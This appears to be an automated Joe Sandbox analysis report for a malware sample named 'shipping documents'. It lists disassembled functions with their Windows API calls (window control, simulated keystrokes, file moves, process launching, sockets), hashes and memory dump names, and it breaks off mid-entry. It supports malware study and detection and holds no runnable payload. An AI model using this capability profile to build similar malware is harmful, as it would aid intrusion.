Instruction ID: a359f50ff783c5ff77a14f2420dfdd535391c8670a3dca03b039a145cda589b2
Opcode Fuzzy Hash: 7883ad16b9d8835579ba23a2537a7be3ffbbe9e18a038cf5d2644299ec14fd98
Instruction Fuzzy Hash: 380162F3D00208BFE750ABA0DD89EE7776DDB08301F0045A6BB4AD2152EA749E858B75

Function 006DD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

GetSystemMetrics.USER32(0000000F), ref: 006DD78A
GetSystemMetrics.USER32(0000000F), ref: 006DD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006DD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006DDA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006DDA24
ShowWindow.USER32(00000003,00000000), ref: 006DDA43
InvalidateRect.USER32(?,00000000,00000001), ref: 006DDA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 006DDA8B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 9390fb73524dc296d8c11f565afe7d818931c73aeb9990d3e326669e57fe1563
Instruction ID: 84ba91ae0c430442f14b74c5fe750dd9e380a9823dced1cac6158cb8ac34da5a
Opcode Fuzzy Hash: 9390fb73524dc296d8c11f565afe7d818931c73aeb9990d3e326669e57fe1563
Instruction Fuzzy Hash: 58B18771A00225ABDF14DF68C9957FD7BB2BF48701F08C06AEC489E399DB35A950CB90

Function 00652A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0068C417,00000004,00000000,00000000,00000000), ref: 00652ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0068C417,00000004,00000000,00000000,00000000,000000FF), ref: 00652B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0068C417,00000004,00000000,00000000,00000000), ref: 0068C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0068C417,00000004,00000000,00000000,00000000), ref: 0068C4D6

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 9d34caa6f78419e22ccfb6d184fb7e8d6f5cd16208465d641651af3e8a75d534
Instruction ID: 37af6fafa47ada48a00e68ed38f5c4082f626b58135066bec123937bc046f221
Opcode Fuzzy Hash: 9d34caa6f78419e22ccfb6d184fb7e8d6f5cd16208465d641651af3e8a75d534
Instruction Fuzzy Hash: 0B412C306046829AC7359B289CB87FB7BD3AB47316F18C91EE84786761C675988ED720

Function 006B7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006B737F

Part of subcall function 00670FF6: std::exception::exception.LIBCMT ref: 0067102C
Part of subcall function 00670FF6: __CxxThrowException@8.LIBCMT ref: 00671041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006B73B6
EnterCriticalSection.KERNEL32(?), ref: 006B73D2
_memmove.LIBCMT ref: 006B7420
_memmove.LIBCMT ref: 006B743D
LeaveCriticalSection.KERNEL32(?), ref: 006B744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006B7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 006B7480

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 434f5b3a902e5bec57407eff2ff907a9d14d48d9d1d2f7c345aeddcadc8ed760
Instruction ID: 58a26f36e4cd8e904f75e3bc7f09936b290ecab6735876e35d2a322c52b4a1a9
Opcode Fuzzy Hash: 434f5b3a902e5bec57407eff2ff907a9d14d48d9d1d2f7c345aeddcadc8ed760
Instruction Fuzzy Hash: 4F318F71904205EBDF50DFA8DC85AAE7BB9FF45710B1481BAF904AB246DB309A50CBA4

Function 006D6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006D645A
GetDC.USER32(00000000), ref: 006D6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006D646D
ReleaseDC.USER32(00000000,00000000), ref: 006D6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006D64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006D64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006D9299,?,?,000000FF,00000000,?,000000FF,?), ref: 006D6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006D6520

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e1229b6c409afba5fd6155e2971b6387d37619f73acc4cb053aa0c1f6daff16f
Instruction ID: 7dd46cbd9d9202585a063e72d0492ae0d56a9fb0e448097ebf0c68dcd756c74e
Opcode Fuzzy Hash: e1229b6c409afba5fd6155e2971b6387d37619f73acc4cb053aa0c1f6daff16f
Instruction Fuzzy Hash: 6D31A072601210BFEB208F50DC4AFEB3FAAEF0A765F044066FE099A291C6759C41CB74

Function 006AC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 006AC087
_memcmp.LIBCMT ref: 006AC0A9
_memcmp.LIBCMT ref: 006AC0C1
_memcmp.LIBCMT ref: 006AC0D4
_memcmp.LIBCMT ref: 006AC0EE
_memcmp.LIBCMT ref: 006AC101
_memcmp.LIBCMT ref: 006AC119
_memcmp.LIBCMT ref: 006AC134

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 3656a7e753f0faa989be1ea7c1909d71087a2f4cfc0eacdfd6365e861a1a16fa
Instruction ID: 3dfcb8da978c35d36da36a7899d1f53a3cae24207854d21e631be175a9ed0cdc
Opcode Fuzzy Hash: 3656a7e753f0faa989be1ea7c1909d71087a2f4cfc0eacdfd6365e861a1a16fa
Instruction Fuzzy Hash: 8421D771741306BBDA50BA258C52FFB239FAF137B4B144025FD099A382E752ED1189A9

Function 006BED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

Part of subcall function 0066FEC6: _wcscpy.LIBCMT ref: 0066FEE9

_wcstok.LIBCMT ref: 006BEEFF
_wcscpy.LIBCMT ref: 006BEF8E
_memset.LIBCMT ref: 006BEFC1

Strings

X, xrefs: 006BEFFE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 9788100bc889e3ce3f8db8d9ae2e316b34b8724aa5c16b93e5b0dfb95ea997bd
Instruction ID: 7f4e61e794300e783a8bff3502a03c708d34f5b8baa4a2eeb739d0aaa0334bf1
Opcode Fuzzy Hash: 9788100bc889e3ce3f8db8d9ae2e316b34b8724aa5c16b93e5b0dfb95ea997bd
Instruction Fuzzy Hash: DEC18171508300DFC754EF24D895A9AB7E6BF84310F04496DF89A9B3A2DB30ED49CB96

Function 006C6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006C6F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006C6F35
WSAGetLastError.WSOCK32(00000000), ref: 006C6F48
htons.WSOCK32(?,?,?,00000000,?), ref: 006C6FFE
inet_ntoa.WSOCK32(?), ref: 006C6FBB

Part of subcall function 006AAE14: _strlen.LIBCMT ref: 006AAE1E
Part of subcall function 006AAE14: _memmove.LIBCMT ref: 006AAE40

_strlen.LIBCMT ref: 006C7058
_memmove.LIBCMT ref: 006C70C1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 0e785845088090837738532c78bba92418a293ff7c4a24d6022bc29ef7b1f5ea
Instruction ID: bd3516bf5f88d04211a15d02914ecceb1002225fa20c670b4673fab168f3247b
Opcode Fuzzy Hash: 0e785845088090837738532c78bba92418a293ff7c4a24d6022bc29ef7b1f5ea
Instruction Fuzzy Hash: B381B171608300ABD750EF24CC86FABB3EAEF84714F14451DF9569B292DA70AD05CBA6

Function 00651424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e9003c32670c1a3301519100b784f126fcbe735f13a39ebe499998640a17be1
Instruction ID: 117fb26c04ecd4ba0f979b7fca06bc8e5034cfbd08b53ff4b6ed6f7c0e82c694
Opcode Fuzzy Hash: 2e9003c32670c1a3301519100b784f126fcbe735f13a39ebe499998640a17be1
Instruction Fuzzy Hash: DA717C30900109EFCB049F98CC49ABEBBBAFF86311F148159F915AA251C730AA55CBA4

Function 006DB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(013256F8), ref: 006DB6A5
IsWindowEnabled.USER32(013256F8), ref: 006DB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 006DB795
SendMessageW.USER32(013256F8,000000B0,?,?), ref: 006DB7CC
IsDlgButtonChecked.USER32(?,?), ref: 006DB809
GetWindowLongW.USER32(013256F8,000000EC), ref: 006DB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006DB843

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: bcde49e4f349d040f0a16e8992fcd90b6f9371102fcfa1cd09391316ffd1ec66
Instruction ID: 614f1f866ff4ee7b015161ffafca93d5c6b325f8446172aebf18276fe5f64c30
Opcode Fuzzy Hash: bcde49e4f349d040f0a16e8992fcd90b6f9371102fcfa1cd09391316ffd1ec66
Instruction Fuzzy Hash: B3717D34E01244EFDB219F64C8A4FEA7BBBEF49300F16506AE946973A5C731E941CB54

Function 006CF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006CF75C
_memset.LIBCMT ref: 006CF825
ShellExecuteExW.SHELL32(?), ref: 006CF86A

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

Part of subcall function 0066FEC6: _wcscpy.LIBCMT ref: 0066FEE9

GetProcessId.KERNEL32(00000000), ref: 006CF8E1
CloseHandle.KERNEL32(00000000), ref: 006CF910

Strings

@, xrefs: 006CF839

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 90dae49dab20c21c81c2ea2905607d25d1c56d62fdb1cb32d88ed3408167efdb
Instruction ID: eda8b77739b5a1fee2137f0c7874e1b373114364c0b459ead576b2b4be1227f4
Opcode Fuzzy Hash: 90dae49dab20c21c81c2ea2905607d25d1c56d62fdb1cb32d88ed3408167efdb
Instruction Fuzzy Hash: 8A616A75A00619DFCF14EF54C580AAEBBB6FF48310F14846DE85AAB351CB30AD45CBA4

Function 006B145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 006B149C
GetKeyboardState.USER32(?), ref: 006B14B1
SetKeyboardState.USER32(?), ref: 006B1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 006B1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 006B155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 006B15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006B15C8

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 1c5a715ee5f66b8eb6b2271f8397030cbf6141fae5f9b479b0603892e0348cd0
Instruction ID: 151a768a25fe7b93ed092579111228f5808a4b7127d7e72bc3650c254dc96b1e
Opcode Fuzzy Hash: 1c5a715ee5f66b8eb6b2271f8397030cbf6141fae5f9b479b0603892e0348cd0
Instruction Fuzzy Hash: 4A51F0E1A042D53EFB3643248C65BFA7FAB5B47304F488489E1D64A9C2D694ECC4D760

Function 006B1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 006B12B5
GetKeyboardState.USER32(?), ref: 006B12CA
SetKeyboardState.USER32(?), ref: 006B132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006B1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006B1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006B13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006B13D9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7cbf9f059c3c5f904f2ab1bf9c4ec9508588a37389625aa16a2cc24ea3b60b0d
Instruction ID: 79a22d7dec7f9c679d866b1270a39a694ae4dfb48eac65163d25472a495dfee5
Opcode Fuzzy Hash: 7cbf9f059c3c5f904f2ab1bf9c4ec9508588a37389625aa16a2cc24ea3b60b0d
Instruction Fuzzy Hash: 7B51E0E09446D53DFB3287248C65BFABFEB5B07300F488489E1D58E9C2E695ACD4D760

Function 006B589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 006B58AC
_wcsncpy.LIBCMT ref: 006B58E1
_wcsncpy.LIBCMT ref: 006B5913
_wcsncpy.LIBCMT ref: 006B5946
_wcsncpy.LIBCMT ref: 006B5988
_wcsncpy.LIBCMT ref: 006B59C2
_wcsncpy.LIBCMT ref: 006B59F1

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 455d5c756630feb3a87055fbacc8897c7102983f8139248859ed81451ca723ad
Instruction ID: b02a39502499f78be0e39c7f33fce12a7900f0e5e9275325a1e8542dc152004f
Opcode Fuzzy Hash: 455d5c756630feb3a87055fbacc8897c7102983f8139248859ed81451ca723ad
Instruction Fuzzy Hash: F44186A5C2052476CB50FBB4888AACF73AEAF05310F50C95AF519E3222E734E755C7AD

Function 006ADA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006ADAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006ADAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006ADB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 006ADB8E

Strings

DllGetClassObject, xrefs: 006ADB01
,,n, xrefs: 006ADA69

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,n$DllGetClassObject
API String ID: 753597075-149241901
Opcode ID: 4548440e39b37478ca18bdd02e1615f76b4b7eceedb76f671ddbaa82535783c5
Instruction ID: 1c8eb095565739796d41102ba1cb517174b1a7ec54f8178868d17c65ec21f3f4
Opcode Fuzzy Hash: 4548440e39b37478ca18bdd02e1615f76b4b7eceedb76f671ddbaa82535783c5
Instruction Fuzzy Hash: F84180B1601205EFDB15DF54C884A9A7BEAEF45710F1580AAE9069F205D7B1DD44CFA0

Function 006B38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006B38D3,?), ref: 006B48C7

Part of subcall function 006B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006B38D3,?), ref: 006B48E0

lstrcmpiW.KERNEL32(?,?), ref: 006B38F3
_wcscmp.LIBCMT ref: 006B390F
MoveFileW.KERNEL32(?,?), ref: 006B3927
_wcscat.LIBCMT ref: 006B396F
SHFileOperationW.SHELL32(?), ref: 006B39DB

Strings

\*.*, xrefs: 006B3969

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: a301c121be2fa66ccf6282c1221b3070248efbef6bcbc5aafc2d6243f8fc2fa6
Instruction ID: de8aa2a1e47519a9a4166c8448d322f382b236c15255bb73bc0fd14d012f1e34
Opcode Fuzzy Hash: a301c121be2fa66ccf6282c1221b3070248efbef6bcbc5aafc2d6243f8fc2fa6
Instruction Fuzzy Hash: 924160B25093549AC791EF64C481AEFB7E9AF89340F04092EB48AC3251EB74D68DC756

Function 006D7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006D7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D75C0
IsMenu.USER32(?), ref: 006D75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006D7620
DrawMenuBar.USER32 ref: 006D7633

Strings

0, xrefs: 006D750D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: fb87b115da7a9cecb795f202e57a75f4e7b61ca8679eaa76e86359a8d0b1003b
Instruction ID: 91db6fd4312046f53146b50cda3e5d01664ee0adc43ca11a1a1c44d4d90583f1
Opcode Fuzzy Hash: fb87b115da7a9cecb795f202e57a75f4e7b61ca8679eaa76e86359a8d0b1003b
Instruction Fuzzy Hash: D2412875A05649AFDB10DF58E884EDABBFAFB08314F04812AE91597390E731ED50CF91

Function 006D122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

